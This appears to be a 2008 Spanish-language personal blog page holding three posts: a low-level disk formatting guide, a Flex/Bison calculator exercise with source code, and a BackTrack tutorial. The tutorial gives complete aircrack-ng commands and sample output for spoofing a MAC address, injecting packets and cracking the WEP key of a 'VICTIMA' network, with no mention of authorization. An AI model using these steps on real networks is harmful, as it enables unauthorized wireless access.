Li-yuan (Gear

domingo, 21 de diciembre de 2008

Li-yuan Rito

HOLA AMIGOS, ACA SALUDANDO A TODOS; ESPERANDO ESTEN BIEN.

MUY CONTENTO ME DECIDO APOSTEAR MI BLOG,,, ESPERO LES AGRADE EL AMBIENTE
Y PUEDAN OBTENER ALGUNAS COSAS QUE DEJARE AL ALCANCE.
SIN MAS POR EL MOMENTO LES DEJO EL BLOG......

ATTE: LI-YUAN (GEAR_BOY).

hacking con back track

Abrimos una consola e ingresamos

Código:

iwconfig

Con este comando podremos saber cuál es nuestra interfaz wifi, en mi caso es ath0 como pueden ver en la imagen pero puede ser distinta para ustedes solo es cosa de que la ubiquen, después procederemos a detenerla con el comando

Código:

airmon-ng stop ath0

Después apagamos wifi0 de la siguiente manera

Código:

ifconfig wifi0 down

Para facilitarnos el trabajo de estar memorizando la Mac Adress o simplemente por seguridad la cambiaremos con el siguiente comando

Código:

macchanger -m 00:11:22:33:44:55 wifi0

Ahora pasamos a lo interesante poniendo nuestra tarjeta de red en modo monitor con el comando

Código:

airmon-ng start wifi0

De estar todo correcto nuestra tarjeta estará en modo de monitor que es como nos permitirá capturar paquetes.
Después de esto veremos las redes que tenemos disponibles, ingresaremos lo siguiente

Código:

airodump-ng -w redes ath0

Con esto le estamos diciendo al airodump que deberá de escribir (-w Write) un archivo llamado redes todo lo que capture con la interfaz ath0; con este comando escaneara los 11 canales en busca de redes inalámbricas pero si deseamos restringirlo a un solo canal podemos usar el siguiente comando

Código:

airodump-ng -w redes --channel 4 ath0

Con esto le indicamos que solo va a escanear el canal 4, recuerden que esto es un ejemplo ustedes deben de poner el canal que deseen, al momento de inyectar paquetes es muy útil restringir la captura al canal de nuestra victima para as? no desperdiciar tiempo en los otros 10 canales.

Hay otra opción para indicarle que utilice la extensión IVS en vez de CAP que es la que usa por defecto para el archivo de captura, muchos dicen que con este tipo de archivo es mas rápido el crackeo solo hay que agregar --ivs y quedará de la siguiente manera

Código:

airodump-ng --ivs -w redes --channel 4 ath0

Una vez que hemos ingresado nuestro comando correctamente nos aparecer? una pantalla como esta
Aquí esta escaneando todos los canales pero como del que deseo extraer la contraseña esta en el canal 4 yo utilizare el comando anterior, aquí pueden ver que solo estoy escaneando el canal 4, dejamos esta consola así tal como está y abrimos una nueva para ingresar el siguiente comando

Código:

aireplay-ng -1 0 -e VICTIMA -a 00:4E:3F:49:F3:49 -h 00:11:22:33:44:55 ath0

Aquí lo que deberán modificar es VICTIMA es el SSID o nombre de la red de la que desean conseguir la clave WEP, después la Mac adress de la víctima y por último la nuestra. En dado caso que el SSID tenga mas de una palabra ingresaremos el comando de la siguiente manera:

Código:

aireplay-ng -1 0 -e red\de\internet -a 00:4E:3F:49:F3:49 -h 00:11:22:33:44:55 ath0

Note como se utilizan diagonales en vez de espacios
Si hacemos todo correctamente nos aparecerá un mensaje como este

Código:

03:35:14 Waiting for beacon frame (BSSID: 00:14:95C:0B:71) on channel 4
03:35:14 Sending Authentication Request (Open System) [ACK]
03:35:14 Authentication successful
03:35:14 Sending Association Request [ACK]
03:35:14 Association successful :-)

Si todo va bien hasta aquí comenzaremos con la inyección de paquetes con el comando

Código:

aireplay-ng -3 -b 00:4E:3F:49:F3:49 -h 00:11:22:33:44:55 ath0

Podremos ver en nuestra consola anterior el progreso de la captura de paquetes en la sección #Data que es la que nos interesa que junte mas de 5000 paquetes para conseguir la clave, el proceso puede variar mucho dependiendo de la calidad de la señal y la distancia de nuestra victima así como otros factores mas, pero debemos de ser pacientes en algunos casos mientras que en otros será todo muy rápido.

Después de haber juntado suficientes paquetes abrimos una nueva consola e ingresamos el siguiente comando

Código:

aircrack-ng redes-01.ivs

Así es el comando por defecto pero si nuestra victima es un 2wire podremos agregarle -n 64 indicándole que la clave es de 40 bits y asi acelerar el proceso

Código:

aircrack-ng -n 64 redes-01.ivs

Y si creemos que pudieran ser únicamente números solo agregaremos -t al comando

Código:

aircrack-ng -n 64 –t redes-01.ivs

Si ustedes utilizaron la extensión por defecto solo deben de cambiar ivs por cap y listo a esperar a que encuentre la llave, en algunas ocasiones nos pedirá que capturemos primero mas paquetes pero si corremos con suerte y hemos capturado los suficientes tendremos la clave en unos instantes.

Key Found. [11:26:15:18:26]

Esta es nuestra clave, sin los puntos claro.
Pues hasta aquí llega esta guía, espero que sea de utilidad a cada uno de ustedes, solo les pido que si la publican en otras páginas respeten la auditoria así como los agradecimientos.

Resumen de comandos
Código:

iwconfig
airmon-ng stop ath0
ifconfig wifi0 down
macchanger -m 00:11:22:33:44:55 ath0
airmon-ng start wifi0
airodump-ng -w redes ath0
aireplay-ng -1 0 -e VICTIMA -a 00:4E:3F:49:F3:49 -h 00:11:22:33:44:55 ath0
aireplay-ng -3 -b 00:4E:3F:49:F3:49 -h 00:11:22:33:44:55 ath0
aircrack-ng redes-01.cap

Agradezco a Sanatas y kyokorn pues gracias a sus tutoriales aprendí esta técnica.

Formateo a Bajo Nivel

Hace algunos años los formateos en bajo nivel se podían realizar desde la misma configuración del bios del ordenador. Pero hoy en día eso ya no es posible desde el Bios

Cómo realizar un formateo en bajo nivel con HDD Low Level FormatTool
En muchas ocasiones nuestro HDD/Disco duro, memorias USB, han sufrido errores muy graves los cuáles han sido imposible acceder a ellos, ni tan siquiera Windows nos lo reconoce ya que los sectores y los clusters han sido dañados desde la pista 0, y no podemos hacer nada.

Pues bien, con la herramienta (HDD Low Level FormatTool) haremos un formateo de bajo nivel para recuperar nuestro disco como si saliera de fábrica, cada fabricante de discos duros tiene en su web un disquete el cuál puedes descargar y realizar el formateo en bajo nivel.

Pero la herramienta que vamos a utilizar nos servirá sin ningún problema (HDD Low Level FormatTool) tiene soporte para diferentes tipos de discos como SATA, IDE, SCSI, USB y FIREWIRE. Y reconoce los fabricantes Maxtor, Hitachi, Seagate, Samsung, Toshiba, Fujitsu, IBM y Quantumy Western Digital. Empecemos !!!!!!

1 - Primero descargamos la herramienta
(HDD Low Level FormatTool) los pasos de instalación me los salto, porque en dicho tutorial únicamente os enseñaremos su funcionamiento y hoy en día el 99% sabe instalar un programa.

2 - Una vez instalado el programa lo ejecutamos y nos saldrá la siguiente imagen informándonos de los discos duros/memorias que tenemos en nuestro PC y que vamos a recuperar.

3 - escogeremos la unidad a formatear en bajo nivel (ATENCIÓN) MUY IMPORTANTE : aseguraros de que la unidad es la que queréis formatear y no os confundáis, no habrá vuelta atrás, y todos los datos en ella se perderán definitivamente .

4 - aquí seleccionaréis la casila que indica la imagen LOW LEVEL FORMAT y más abajo FORMAT THIS DEVICE y comenzará el formateo en bajo nivel.

5 - después de un tiempo , al acabar su trabajo nos informará que la unidad ha sido formateada (aceptamos).

Ya puedes utilizar tu unidad, Windows te dira que la unidad no tiene formato y deberás dárselo, no lo hagáis en formato rápido si NO, hacerlo en FORMATO LENTO , si todo ha salido bien, ya tendréis recuperada vuestra unidad.

Introducción a los generadores de analizadores léxicos y sintácticos FLEX y BISON

Introducción a los generadores de analizadores léxicos y sintácticos FLEX y BISON:

Implementación de una pequeña calculadora

Con la ayuda de FLEX, el generador automático de analizadores léxicos, y BISON, el generador automático de analizadores sintácticos, implementar una pequeña calculadora que permita realizar las operaciones aritméticas básicas y las trigonométricas como el seno y el coseno.
Especificación Léxica
Se han de reconocer los siguientes componentes léxicos definidos como:
TKN_NUM [0-9]+("."[0-9]+)?
TKN_ASIGN "="
TKN_PTOCOMA ";"
TKN_ID [a-zA-z][a-zA-Z0-9]*
TKN_MULT "*"
TKN_DIV "/"
TKN_MAS "+"
TKN_MENOS "-"
TKN_PAA "("
TKN_PAC ")"
TKN_SEN "sen"
TKN_COS "cos"
Especificación Sintáctica
El lenguaje a reconocer viene definido por la siguiente gramática:
Calculadora → id = Expresion ;
Expresion → num |
Expresion + Expresion | Expresion - Expresion |
Expresion * Expresion | Expresion / Expresion |
( Expresion ) | sen ( Expresion ) | cos ( Expresion )

No olvidar establecer las precedencias y asociatividad de los operadores. Los operadores suma + y resta – tienen igual prioridad y son asociativos por la izquierda. Los operadores multiplicación * y división / son asociativos por la izquierda, tienen igual prioridad entre sí y mayor que la de los anteriores.
Se pide:
• Implementar el analizador léxico con Flex
• Implementar el analizador sintáctico con Bison.
• Compilar bison con la opción --verbose y editar el fichero para ver el autómata LR. ¿Cuántos estados tiene?
• Insertar las acciones semánticas necesarias para calcular el valor numérico de la expresión.
• Modificar la gramática para que se puedan reconocer una lista de asignaciones separadas por el punto y coma ;
• Modificar la gramática para incluir el operador potencia (^) y la función raíz cuadrada (sqrt).
Ejemplo
Ante la siguiente entrada
a =12+2*cos(3.14) ;
La salida debe ser:
El valor del identificador a es 10.

Fichero léxico_solo.l
%{
/* Ejemplo para una pequeña calculadora que permite
trabajar con numeros enteros y reales con las operaciones
básicas de suma, resta, producto, division y trigonometricas como el seno y el coseno */
#include
#include
int nlines=0;
%}
DIGITO [0-9]
ID [a-zA-Z][a-zA-Z0-9_]*
%%
{DIGITO}+ {printf("Encontrado TKN_NUM_ENTERO: %d",atoi(yytext));}
{DIGITO}+"."{DIGITO}+ {printf("Encontrado TKN_NUM_REAL: %f",atof(yytext));}
"=" {printf("Encontrado TKN_ASIGN: %s",yytext);}
";" {printf("Encontrado TKN_PTOCOMA: %s",yytext);}
"*" {printf("Encontrado TKN_MULT: %s",yytext);}
"/" {printf("Encontrado TKN_DIV: %s",yytext);}
"+" {printf("Encontrado TKN_MAS: %s",yytext);}
"-" {printf("Encontrado TKN_MENOS: %s",yytext);}
"(" {printf("Encontrado TKN_PAA: %s",yytext);}
")" {printf("Encontrado TKN_PAC: %s",yytext);}
"cos" {printf("Encontrado TKN_COS: %s",yytext);}
"sen" {printf("Encontrado TKN_SEN: %s",yytext);}
{ID} {printf("Encontrado TKN_ID: %s",yytext);}
"\n" {nlines++;}
.
%%
void main(int argc,char **argv)
{
if (argc>1)
yyin=fopen(argv[1],"rt");
else
yyin=stdin;
yylex();
printf("\nNumero lineas analizadas: %d\n", nlines);
}
/* para compilar
flex lexico.l
cc lex.yy.c -o milex -lfl -lm
*/

Fichero léxico.l (versión a enlazar con Bison)
%{
/* Ejemplo para una pequeña calculadora que permite trabajar
con las operaciones básicas de suma, resta, producto, division y
trigonometricas como el seno y el coseno */
#include
#include
#include "sintactico.tab.h"
int nlines=0;
%}
DIGITO [0-9]
ID [a-zA-Z][a-zA-Z0-9_]*
%%
{DIGITO}+("."{DIGITO}+)? {//printf("Encontrado TKN_NUM: %f\n",atof(yytext));
yylval.real=atof(yytext);
return(TKN_NUM);}
"=" {//printf("Encontrado TKN_ASIGN: %s\n",yytext);
return(TKN_ASIGN);}
";" {//printf("Encontrado TKN_PTOCOMA: %s\n",yytext);
return(TKN_PTOCOMA);}
"*" {//printf("Encontrado TKN_MULT: %s\n",yytext);
return(TKN_MULT);}
"/" {//printf("Encontrado TKN_DIV: %s\n",yytext);
return(TKN_DIV);}
"+" {//printf("Encontrado TKN_MAS: %s\n",yytext);
return(TKN_MAS);}
"-" {//printf("Encontrado TKN_MENOS: %s\n",yytext);
return(TKN_MENOS);}
"(" {//printf("Encontrado TKN_PAA: %s\n",yytext);
return(TKN_PAA);}
")" {//printf("Encontrado TKN_PAC: %s\n",yytext);
return(TKN_PAC);}
"cos" {//printf("Encontrado TKN_COS: %s\n",yytext);
return(TKN_COS);}
"sen" {//printf("Encontrado TKN_SEN: %s\n",yytext);
return(TKN_SEN);}
{ID} {//printf("Encontrado TKN_ID: %s\n",yytext);
return(TKN_ID);}
"\n" {nlines++;}
.
%%
/********
Para el lexico solo
void main(int argc,char **argv)
{
if (argc>1)
yyin=fopen(argv[1],"rt");
else
yyin=stdin;
yylex();
printf("\nNumero lineas analizadas: %d\n", nlines);
}
*******/
/* para compilar
flex lexico.l
cc lex.yy.c -o milex -lfl -lm
*/

Fichero sintactico.y (Bison)
%{
/* Ejemplo para una pequeña calculadora que permite trabajar
con numeros enteros y reales con las operaciones básicas de
suma, resta, producto, division y trigonometricas como el seno y el coseno */
#include
#include
#include
extern int yylex(void);
extern char *yytext;
extern int nlines;
extern FILE *yyin;
void yyerror(char *s);
%}
%union
{
float real;
}
%start Calculadora
%token TKN_NUM
%token TKN_ASIGN
%token TKN_PTOCOMA
%token TKN_MULT
%token TKN_DIV
%token TKN_MAS
%token TKN_MENOS
%token TKN_PAA
%token TKN_PAC
%token TKN_COS
%token TKN_SEN
%token TKN_ID
%type Calculadora
%type Expresion
%left TKN_MAS TKN_MENOS
%left TKN_MULT TKN_DIV
%%
Calculadora : TKN_ID { printf("El valor de %s es: ", yytext);}
TKN_ASIGN Expresion TKN_PTOCOMA { printf("%5.2f\n", $4); } ;
Expresion : TKN_NUM {$$=$1;}|
Expresion TKN_MAS Expresion {$$=$1+$3;}|
Expresion TKN_MENOS Expresion {$$=$1-$3;}|
Expresion TKN_MULT Expresion {$$=$1*$3;}|
Expresion TKN_DIV Expresion {$$=$1/$3;} |
TKN_PAA Expresion TKN_PAC {$$=$2;}|
TKN_COS TKN_PAA Expresion TKN_PAC {$$=cos($3);}|
TKN_SEN TKN_PAA Expresion TKN_PAC {$$=sin($3);};
%%
void yyerror(char *s)
{
printf("Error %s",s);
}
int main(int argc,char **argv)
{
if (argc>1)
yyin=fopen(argv[1],"rt");
else
yyin=stdin;
yyparse();
printf("FIN del Analisis. Entrada CORRECTA\n");
printf("Numero lineas analizadas: %d\n", nlines);
return 0;
}
/* para compilar
bison -d sintactico.y
flex lexico.l
cc lex.yy.c sintactico.tab.c -o analizador -lfl -lm
*/

Li-yuan (Gear_Boy)

domingo, 21 de diciembre de 2008

Li-yuan Rito

Gears of War 2

hacking con back track

Li-yuan (Gear_Boy)

Pá que vean que no soy ojete

Mis Contactos

Seguidores

Placa de Facebook

Archivo del blog

Datos personales

Formateo a Bajo Nivel

Introducción a los generadores de analizadores léxicos y sintácticos FLEX y BISON